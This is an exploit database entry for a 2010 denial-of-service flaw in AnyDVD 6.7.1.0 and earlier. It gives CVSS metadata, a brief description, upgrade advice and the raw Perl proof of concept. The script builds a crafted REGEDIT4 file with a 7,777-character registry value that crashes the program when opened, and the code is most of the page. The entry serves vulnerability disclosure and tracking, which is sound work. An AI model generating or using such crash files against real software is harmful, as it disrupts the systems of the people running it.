header-logo
Suggest Exploit
vendor:
AnyDVD
by:
Havok
7,8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: AnyDVD
Affected Version From: 6.7.1.0
Affected Version To: 6.7.1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:slysoft:anydvd
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

AnyDVD <= 6.7.1.0 Denial Of Service Vulnerability

A denial of service vulnerability exists in AnyDVD version 6.7.1.0 and earlier. By creating a specially crafted REGEDIT4 file, an attacker can cause a denial of service condition when the file is opened. The file must contain a REGEDIT4 header, followed by a registry key containing a large string of 'A' characters.

Mitigation:

Upgrade to the latest version of AnyDVD.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#AnyDVD <= 6.7.1.0 Denial Of Service Vulnerability
#By Havok, from France. (c'est les vacances \o/. Mais y a plus d'essence :(. Rime de leet spotted :P).
#23/10/2010
#Tested on Windows XP SP3.
#Software still available here at the moment : http://static.slysoft.com/SetupAnyDVD.exe
#It seems that RegAnyDVD.exe is our friend. :)

my $w00T_omg= "\x41" x 7777;
open(file,">DoS.AnyDVD");
print file "REGEDIT4\n\n";
print file "[HKEY_LOCAL_MACHINE\\Software\\SlySoft\\AnyDVD\\Key]\n";
print file "\"Key\"=\"$w00T_omg\"";
print "The file has been created successfully. Open it and BOOM. Cheers!";
close(file);

Navigation

Suggest Exploit

Services By CQR